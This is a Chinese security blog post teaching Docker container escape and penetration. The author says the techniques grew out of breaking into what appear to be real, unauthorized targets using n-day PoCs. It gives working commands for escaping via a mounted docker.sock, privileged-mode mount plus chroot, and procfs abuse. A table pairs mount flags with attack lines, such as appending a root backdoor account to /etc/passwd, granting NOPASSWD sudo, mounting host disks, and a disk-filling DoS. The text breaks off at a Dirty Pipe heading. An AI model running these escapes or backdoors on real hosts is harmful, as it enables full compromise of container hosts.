

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/2.png">
  <link rel="icon" href="/img/2.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Yf3te">
  <meta name="keywords" content="">
  
    <meta name="description" content="Docker技法前言最近在学一些常见nday的深度利用，于是就用一些nday的poc在阿美的资产里面遨游一下，正当我高高兴兴在拿下shell时，不是哥们！这玩意不对啊，怎么默认在一个为&#x2F;app的目录下，其他主机反弹shell后都在root等home目录下，为什么就他不一样。定睛一看，原来是个docker，于是就趁此机会，好好汇总一下docker逃逸的技法！！！那就先从docker基础">
<meta property="og:type" content="article">
<meta property="og:title" content="由一次docker逃逸而起的docker总结">
<meta property="og:url" content="http://example.com/2025/05/13/%E7%94%B1%E4%B8%80%E6%AC%A1docker%E9%80%83%E9%80%B8%E8%80%8C%E8%B5%B7%E7%9A%84docker%E6%80%BB%E7%BB%93/index.html">
<meta property="og:site_name" content="Yf3te--枯木怯逢春...">
<meta property="og:description" content="Docker技法前言最近在学一些常见nday的深度利用，于是就用一些nday的poc在阿美的资产里面遨游一下，正当我高高兴兴在拿下shell时，不是哥们！这玩意不对啊，怎么默认在一个为&#x2F;app的目录下，其他主机反弹shell后都在root等home目录下，为什么就他不一样。定睛一看，原来是个docker，于是就趁此机会，好好汇总一下docker逃逸的技法！！！那就先从docker基础">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/11.jpg">
<meta property="article:published_time" content="2025-05-13T14:04:54.000Z">
<meta property="article:modified_time" content="2025-05-13T14:06:41.379Z">
<meta property="article:author" content="Yf3te">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/11.jpg">
  
  
  
  <title>由一次docker逃逸而起的docker总结 - Yf3te--枯木怯逢春...</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  



  
<link rel="stylesheet" href="/css/glassBg.css">
<link rel="stylesheet" href="/css/cloudedGlass.css">
<link rel="stylesheet" href="https://cdn.bootcdn.net/ajax/libs/lxgw-wenkai-screen-webfont/1.7.0/style.min.css">
<link rel="stylesheet" href="//cdn.jsdelivr.net/gh/EmoryHuang/BlogBeautify@1.1/shubiao.css">
<link rel="stylesheet" href="//cdn.jsdelivr.net/gh/EmoryHuang/BlogBeautify@1.1/scroll.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.7","typing":{"enable":true,"typeSpeed":50,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"ground_glass":{"enable":true},"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":"nPsiBpqAh9nfJ5Dy1WuaF7QX-MdYXbMMI","app_key":"uHgPDZvMgamWIL1SjZs4NpY4","server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  
    <!-- Google tag (gtag.js) -->
    <script async>
      if (!Fluid.ctx.dnt) {
        Fluid.utils.createScript("https://www.googletagmanager.com/gtag/js?id=", function() {
          window.dataLayer = window.dataLayer || [];
          function gtag() {
            dataLayer.push(arguments);
          }
          gtag('js', new Date());
          gtag('config', '');
        });
      }
    </script>
  

  

  

  

  
    
  



  
<meta name="generator" content="Hexo 7.2.0"></head>


<body><!-- hexo injector body_begin start --><div id="web_bg"></div><!-- hexo injector body_begin end -->
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Yf3_te的博客</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/10.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="由一次docker逃逸而起的docker总结"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-05-13 22:04" pubdate>
          2025年5月13日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          6.9k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          58 分钟
        
      </span>
    

    
    
      
        <span id="leancloud-page-views-container" class="post-meta" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="leancloud-page-views"></span>次
        </span>
        
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">由一次docker逃逸而起的docker总结</h1>
            
            
              <div class="markdown-body">
                
                <meta name="referrer" content="no-referrer"/>

<h2 id="Docker技法"><a href="#Docker技法" class="headerlink" title="Docker技法"></a>Docker技法</h2><h3 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h3><p>最近在学一些常见nday的深度利用，于是就用一些nday的poc在阿美的资产里面遨游一下，正当我高高兴兴在拿下shell时，不是哥们！这玩意不对啊，怎么默认在一个为&#x2F;app的目录下，其他主机反弹shell后都在root等home目录下，为什么就他不一样。定睛一看，原来是个docker，于是就趁此机会，好好汇总一下docker逃逸的技法！！！那就先从docker基础开始看看吧。</p>
<h3 id="Docker基础"><a href="#Docker基础" class="headerlink" title="Docker基础"></a>Docker基础</h3><p>先判断Dcoker环境</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">ls</span> / -la    <span class="hljs-comment">#根目录下运行</span><br></code></pre></td></tr></table></figure>

<p>出现关键词“.dockerenv”，如下</p>
<p><img src="https://s2.loli.net/2025/05/13/2xviet9MKkIGlrT.png" srcset="/img/loading.gif" lazyload alt="image-20250509215622959.png"></p>
<p>查看Docker状态</p>
<figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ebnf"><span class="hljs-attribute">sudo systemctl status docker</span><br></code></pre></td></tr></table></figure>

<p>列出所有docker环境</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">docker ps -a   <span class="hljs-comment">#所有，报错未存活</span><br>docker ps      <span class="hljs-comment">#存活的docker</span><br></code></pre></td></tr></table></figure>

<p>容器的详细信息</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">docker inspect &lt;container-id or name&gt;<br></code></pre></td></tr></table></figure>

<p>进入运行中的容器bash</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">docker <span class="hljs-built_in">exec</span> -it &lt;container-id or name&gt; bash<br>docker <span class="hljs-built_in">exec</span> -it &lt;container-id or name&gt; sh<br>docker <span class="hljs-built_in">exec</span> -u 0 -it &lt;container-id or name&gt; bash   <span class="hljs-comment">#root进入运行</span><br></code></pre></td></tr></table></figure>

<p>查看Docker的版本（内部、宿主机通用）</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">docker -v<br>docker version  <span class="hljs-comment">#更加详细</span><br></code></pre></td></tr></table></figure>

<h3 id="Docker渗透"><a href="#Docker渗透" class="headerlink" title="Docker渗透"></a>Docker渗透</h3><p>Docker是主机下的镜像容器，他的bash、sh，并不等同于主机。相当于物理机下的虚拟机。有时候部分web站点可能就是docker搭建的，对于主机而言看似安全，其实不然。docker中也可能含有对主机有害的信息、渗透点，所以对于docker，我就总结了两种渗透方式，不过在这之前我们还是来了解了解docker的一个机制。<strong>挂载！</strong></p>
<h3 id="挂载"><a href="#挂载" class="headerlink" title="挂载"></a>挂载</h3><p>在docker中，<strong>挂载</strong>是一个很重要的概念，它往往与我们在渗透利用中挂钩，挂载大概来说就是docker的目录与宿主机的目录之间形成的映射，docker修改目录的内容，其宿主机默认也会进行同样的操作。但是docker会多一层权限限制，不过如果权限得当，则可以通过docker查看、修改、写入、执行文件，从而改变宿主机的目录、文件。</p>
<p>挂载的细节可以查看：<a target="_blank" rel="noopener" href="https://blog.csdn.net/wang2leee/article/details/134453249">https://blog.csdn.net/wang2leee/article/details/134453249</a></p>
<p><strong>常规挂载操作</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment">#在启动docker时进行挂载：</span><br>docker run -v /proc:/host_proc  把宿主机的/proc挂载到docker的/host_proc<br><br><span class="hljs-comment">#在docker内查看宿主机与docker的挂载关系</span><br>mount        <br></code></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2025/05/13/o6IOvFCc5guG1SR.png" srcset="/img/loading.gif" lazyload alt="image-20250512161414119"></p>
<p>上述proc、devpts这种没有指定目录的挂载一般是docker的默认挂载，对我们的渗透没什么帮助，可以忽略。不过如果是以&#x2F;proc开始，我们就要仔细关注了，光挂载是不够的，我们还要看看其挂载之后的属性带来的阻碍和利用。</p>
<p>所以我们从渗透的角度，看看挂载结果后面括号中的属性</p>
<table>
<thead>
<tr>
<th align="center">属性</th>
<th align="center">作用</th>
<th align="center">渗透利用示例</th>
<th align="center">防御建议</th>
</tr>
</thead>
<tbody><tr>
<td align="center"><strong>ro&#x2F;rw</strong></td>
<td align="center">控制文件系统只读或读写</td>
<td align="center"><code>rw</code> 权限下，可篡改 <code>/etc/passwd</code>，添加后门账户： <code>echo &#39;eviluser:x:0:0::/:/bin/sh&#39; &gt;&gt; /etc/passwd</code></td>
<td align="center">关键目录（如 <code>/etc</code>）强制设为 <code>ro</code></td>
</tr>
<tr>
<td align="center"><strong>nosuid</strong></td>
<td align="center">禁用 SUID&#x2F;SGID 权限</td>
<td align="center">若未设置，可利用 SUID 程序提权（如 <code>find / -perm -4000</code> 查找可利用的 SUID 文件）</td>
<td align="center">所有用户可控挂载点强制启用 <code>nosuid</code></td>
</tr>
<tr>
<td align="center"><strong>nodev</strong></td>
<td align="center">禁止创建设备文件</td>
<td align="center">若未设置，可创建磁盘设备文件并挂载宿主机磁盘： <code>mknod /dev/sda1 b 8 1 &amp;&amp; mount /dev/sda1 /mnt</code></td>
<td align="center">容器和非特权挂载点强制启用 <code>nodev</code></td>
</tr>
<tr>
<td align="center"><strong>noexec</strong></td>
<td align="center">禁止执行二进制文件</td>
<td align="center">若未设置，可在可写目录（如 <code>/tmp</code>）上传并执行恶意程序： <code>gcc exploit.c -o /tmp/exp &amp;&amp; /tmp/exp</code></td>
<td align="center">临时目录和用户可控分区启用 <code>noexec</code></td>
</tr>
<tr>
<td align="center"><strong>size&#x3D;</strong></td>
<td align="center">限制文件系统大小（如 <code>tmpfs</code>）</td>
<td align="center">通过填满内存文件系统触发 DoS： <code>dd if=/dev/zero of=/dev/shm/fill bs=1M count=65536</code></td>
<td align="center">限制 <code>size=64M</code> 并监控使用情况</td>
</tr>
<tr>
<td align="center"><strong>relatime</strong></td>
<td align="center">仅在文件修改时更新访问时间</td>
<td align="center">通过监控访问时间推断敏感操作（如读取密钥文件）： <code>stat -c %x /etc/shadow</code></td>
<td align="center">对敏感文件使用 <code>noatime</code> 完全禁用访问时间记录</td>
</tr>
<tr>
<td align="center"><strong>mode&#x3D;</strong></td>
<td align="center">设置目录&#x2F;文件权限</td>
<td align="center">若权限过松（如 <code>mode=777</code>），可篡改配置文件： <code>echo &#39;ALL ALL=(ALL) NOPASSWD:ALL&#39; &gt;&gt; /etc/sudoers</code></td>
<td align="center">遵循最小权限原则（如 <code>mode=755</code> 目录、<code>644</code> 文件）</td>
</tr>
<tr>
<td align="center"><strong>inode64</strong></td>
<td align="center">允许 64 位 inode（用于大容量存储）</td>
<td align="center">结合文件系统漏洞绕过路径限制（如利用 XFS inode 溢出漏洞 CVE-2018-14634）<a target="_blank" rel="noopener" href="https://github.com/luan0ap/cve-2018-14634">https://github.com/luan0ap/cve-2018-14634</a></td>
<td align="center">仅在内核 ≥4.16 时启用，并定期更新内核</td>
</tr>
<tr>
<td align="center"><strong>gid&#x3D;</strong></td>
<td align="center">设置默认组 ID</td>
<td align="center">若组权限配置错误（如 <code>gid=0</code>），可通过组权限读取敏感文件： <code>ls -l /etc/shadow</code> → 发现组为 <code>root</code> 可读</td>
<td align="center">避免将敏感目录的组 ID 设为特权组（如 <code>gid=0</code>）</td>
</tr>
<tr>
<td align="center"><strong>ptmxmode&#x3D;</strong></td>
<td align="center">设置伪终端设备权限</td>
<td align="center">若权限过松（如 <code>ptmxmode=666</code>），可劫持终端会话： <code>cat /dev/ptmx &gt; /tmp/log</code></td>
<td align="center">设置为 <code>ptmxmode=620</code> 并限制访问组</td>
</tr>
<tr>
<td align="center"><strong>lowerdir&#x3D;</strong></td>
<td align="center">OverlayFS 的只读层路径</td>
<td align="center">路径遍历漏洞（如 CVE-2021-41091）： <code>mkdir /merged &amp;&amp; mount -t overlay overlay -o lowerdir=/etc,upperdir=/upper,workdir=/work /merged</code> → 通过 <code>/merged/passwd</code> 读取宿主机文件</td>
<td align="center">严格限制 <code>lowerdir</code> 路径，禁止包含敏感目录</td>
</tr>
<tr>
<td align="center"><strong>nsdelegate</strong></td>
<td align="center">启用 Cgroup 命名空间委托</td>
<td align="center">通过创建子 Cgroup 绕过资源限制（如 CPU&#x2F;内存）： <code>mkdir /sys/fs/cgroup/cpu/attacker &amp;&amp; echo $$ &gt; /sys/fs/cgroup/cpu/attacker/tasks</code></td>
<td align="center">仅在需要时启用，配合 <code>memory_recursiveprot</code></td>
</tr>
<tr>
<td align="center"><strong>memory_recursiveprot</strong></td>
<td align="center">防止子 Cgroup 绕过内存限制</td>
<td align="center">若未设置，可在子 Cgroup 中禁用内存限制： <code>echo 0 &gt; /sys/fs/cgroup/memory/attacker/memory.limit_in_bytes</code></td>
<td align="center">Cgroup v2 强制启用此参数</td>
</tr>
</tbody></table>
<p>基础了解完了，我们就步入正题——<strong>docker渗透</strong>！！！</p>
<h3 id="1、信息泄露"><a href="#1、信息泄露" class="headerlink" title="1、信息泄露"></a>1、信息泄露</h3><p>当我们拿下了docker的shell之后，可能docker中的服务会有一些敏感信息泄露，例如nacos等服务其中可能就含有数据库的连接文件之类的。还有就是挂载了宿主的一些目录也可能存在一些泄露，如下面</p>
<figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs jboss-cli">mount | grep -E &#x27;<span class="hljs-string">/etc</span>|<span class="hljs-string">/dev</span>|<span class="hljs-string">/proc</span>|<span class="hljs-string">/sys</span>|<span class="hljs-string">/var/run</span>&#x27;   <span class="hljs-comment">#通过检索可能的敏感挂载</span><br></code></pre></td></tr></table></figure>

<p>检索到了下面的内容，我们进一步看一看</p>
<p><img src="https://s2.loli.net/2025/05/13/mKagdRkJ7x3DYUn.png" srcset="/img/loading.gif" lazyload alt="image-20250511221845486"></p>
<p>我最先关注点在&#x2F;dev&#x2F;sda</p>
<p>一般而言&#x2F;dev&#x2F;sda就是宿主机主要磁盘，其中会包含&#x2F;dev&#x2F;sda1、&#x2F;dev&#x2F;sda2、&#x2F;dev&#x2F;sda3等多个分区…，其中就挂载着根目录，所以我们的关注点大多在这个挂载之下，那就看看上面的<code>/dev/sda2</code>挂载情况</p>
<p><img src="https://s2.loli.net/2025/05/11/3MXrIQR7hf58jwl.png" srcset="/img/loading.gif" lazyload alt="image-20250511222229544"></p>
<p>看看这是什么？就不用多说了吧，hiahia！！！其次可以猜测，&#x2F;dev&#x2F;sda2可能是根目录，我们可以试试直接访问，不过试过不怎么行</p>
<p>紧接着我了解一下docker逃逸</p>
<h3 id="2、Docker逃逸"><a href="#2、Docker逃逸" class="headerlink" title="2、Docker逃逸"></a>2、Docker逃逸</h3><p>在一些特定的情况下，可能存在从Docker逃逸到主机的方法，下面我们来一一介绍</p>
<p>Docker逃逸思路：</p>
<p>1、危险配置导致的逃逸</p>
<p>2、软件主键导致的逃逸</p>
<p>3、内核漏洞逃逸</p>
<p>4、网络与API攻击</p>
<p>5、特殊环境逃逸</p>
<hr>
<h3 id="一、危险配置导致的逃逸"><a href="#一、危险配置导致的逃逸" class="headerlink" title="一、危险配置导致的逃逸"></a>一、危险配置导致的逃逸</h3><h4 id="1-Docker-UNIX-Socket-挂载"><a href="#1-Docker-UNIX-Socket-挂载" class="headerlink" title="1. Docker UNIX Socket 挂载"></a>1. Docker UNIX Socket 挂载</h4><p>Docker UNIX Socket（<code>/var/run/docker.sock</code>）是Docker守护进程（<code>dockerd</code>）与客户端通信的接口，默认以<code>root</code>权限运行。当容器挂载此Socket时，容器内的进程可通过Socket直接与宿主机Docker守护进程交互，<strong>继承守护进程的高权限</strong>，从而绕过容器隔离限制，实现对宿主机的控制。</p>
<p><strong>前置</strong>：容器启动时挂载宿主 <code>/var/run/docker.sock</code></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 在运行alpine容器时挂载 Docker Socket</span><br>docker run -v /var/run/docker.sock:/var/run/docker.sock -it alpine sh <br></code></pre></td></tr></table></figure>

<p><strong>利用</strong>：调用 Docker API 创造特权容器并挂载宿主文件系统</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 进入容器后查看是否有挂载</span><br><span class="hljs-built_in">ls</span> -l /var/run/docker.sock  <span class="hljs-comment"># 检查文件是否存在</span><br>mount | grep docker.sock    <span class="hljs-comment"># 确认挂载来源</span><br></code></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2025/05/13/7kwzVJ4xel8MsWR.png" srcset="/img/loading.gif" lazyload alt="image-20250511215801938"></p>
<p>上面就是没有挂载。若输出显示 <code>docker.sock</code> 的属主为 <code>root</code> 且权限为 <code>rw</code>（如 <code>srw-rw---- 1 root docker</code>），则运行下面命令来逃逸</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">docker -H unix:///var/run/docker.sock run -v /:/host --privileged -it --<span class="hljs-built_in">rm</span> alpine <span class="hljs-built_in">chroot</span> /host sh<br><span class="hljs-comment">#这个命令相当于在docker内部建立了一个，宿主机的根目录下的root的shell命令行</span><br></code></pre></td></tr></table></figure>

<blockquote>
<p>执行后即可以 root 身份访问宿主 <code>/</code> 目录。 </p>
</blockquote>
<h4 id="2-特权模式（–privileged）"><a href="#2-特权模式（–privileged）" class="headerlink" title="2. 特权模式（–privileged）"></a>2. 特权模式（–privileged）</h4><p>通过赋予容器与宿主机相同的 root 权限，绕过命名空间隔离，使可能够直接挂载宿主机文件系统（如 <code>-v /:/host</code>）并通过 <code>chroot</code> 切换根目录，从而在容器内获得宿主机 root shell 的完整控制权，实现容器到宿主机的权限突破。</p>
<p><strong>前置</strong>：容器以特权模式启动</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">docker run --privileged -v /:/mnt -it alpine sh<br></code></pre></td></tr></table></figure>

<p><strong>利用</strong>：挂载宿主磁盘并 chroot</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">cat</span> /proc/self/status | grep CapEff  <span class="hljs-comment"># 特权容器 CapEff=0000003fffffffff</span><br>mount | grep <span class="hljs-string">&#x27;/mnt&#x27;</span>                  <span class="hljs-comment"># 查看是否挂载宿主机根目录</span><br></code></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2025/05/13/f8xLrFGzkBMHu5n.png" srcset="/img/loading.gif" lazyload alt="image-20250511220209342"></p>
<p>这明显就没有以特权启动docker，而是以普通权限<code>CapEff: 00000000a80425fb</code>，如果是以高权限用户，则使用一下命令即可逃逸</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 在容器内</span><br>mount /dev/sda1 /mnt                <span class="hljs-comment"># 挂载宿主根分区</span><br><span class="hljs-built_in">chroot</span> /mnt /bin/sh                 <span class="hljs-comment"># 切换到宿主环境</span><br></code></pre></td></tr></table></figure>

<blockquote>
<p>之后可直接修改 &#x2F;etc&#x2F;passwd、植入 SSH 公钥等。 </p>
</blockquote>
<hr>
<p>接下来就是有些危险挂载</p>
<h4 id="3-Procfs-危险挂载"><a href="#3-Procfs-危险挂载" class="headerlink" title="3.Procfs 危险挂载"></a><strong>3.Procfs 危险挂载</strong></h4><hr>
<p><strong>1. Procfs 挂载原理</strong></p>
<p><code>/proc</code>目录 是 Linux 内核提供的虚拟文件系统，用于实时<strong>暴露进程</strong>、硬件、内核参数等信息。如果容器开启时挂载了宿主机的&#x2F;proc目录，我们则可以通过docker直接访问到主机的进程信息。</p>
<p>1、<strong>读取环境变量</strong>：目录<code>/proc/1/environ</code>，其中含有关键信息，并且如果配置不当会可以用于提权，这里扔一个环境变量提权的方法汇总：<a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/146799#h2-0%EF%BC%89">https://www.anquanke.com/post/id/146799#h2-0）</a></p>
<p>2、<strong>内核漏洞利用</strong>：通过 <code>/proc/sys/kernel</code> 可写路径（如 <code>core_pattern</code>）或符号链接（如 <code>/proc/[PID]/root</code>），触发内核漏洞（如 Dirty Pipe）或直接访问宿主机文件系统。</p>
<p>3、<strong>敏感信息泄露</strong>：<code>/proc/self/mountinfo</code> 泄露容器运行时路径，<code>/proc/1/environ</code> 泄露宿主机环境变量。</p>
<hr>
<p><strong>2. Procfs 探测方法</strong></p>
<p><strong>2.1 基础检测</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 检查是否挂载宿主机 /proc</span><br>mount | grep <span class="hljs-string">&#x27;/proc&#x27;</span> | grep -v <span class="hljs-string">&#x27;tmpfs&#x27;</span>    <span class="hljs-comment">#有弊端，需要自己判断一下</span><br></code></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2025/05/13/3iyK1LrX8sUqgmS.png" srcset="/img/loading.gif" lazyload alt="image-20250513150714102"></p>
<p>上面这种情况就是属于docker自身的进程，默认挂载，只有出现<code>/proc on /xxx_proc</code>这种最前面时&#x2F;proc时才是挂载了宿主机的进程</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment">#假设把宿主的/proc挂载到了/host_proc,则如下进行，验证读写权限（示例输出：rw 表示可写）</span><br>grep <span class="hljs-string">&#x27;/host_proc&#x27;</span> /proc/self/mountinfo | grep -o <span class="hljs-string">&#x27;rw&#x27;</span> | xargs -I &#123;&#125; <span class="hljs-built_in">echo</span> <span class="hljs-string">&quot;[!] /proc 权限: &#123;&#125;&quot;</span><br></code></pre></td></tr></table></figure>

<p><strong>2.2 信息泄露验证</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 查看宿主机进程树（PID 1 是否为 dockerd？）</span><br><span class="hljs-built_in">cat</span> /host_proc/1/cmdline | <span class="hljs-built_in">tr</span> <span class="hljs-string">&#x27;\0&#x27;</span> <span class="hljs-string">&#x27; &#x27;</span><br><br><span class="hljs-comment"># 检查宿主机内核版本（判断漏洞影响）</span><br><span class="hljs-built_in">cat</span> /host_proc/version | grep -E <span class="hljs-string">&quot;5\.8|5\.10|5\.15&quot;</span>  <span class="hljs-comment"># Dirty Pipe 影响范围</span><br></code></pre></td></tr></table></figure>

<hr>
<p><strong>3. Procfs 利用方法</strong></p>
<p><strong>3.1 信息收集</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 定位宿主机容器运行时路径（如 runC、Docker）</span><br><span class="hljs-built_in">cat</span> /host_proc/1/mountinfo | grep <span class="hljs-string">&#x27;docker/containers&#x27;</span> | awk <span class="hljs-string">&#x27;&#123;print $5&#125;&#x27;</span><br></code></pre></td></tr></table></figure>

<p><strong>3.2 Dirty Pipe 覆盖宿主机二进制</strong></p>
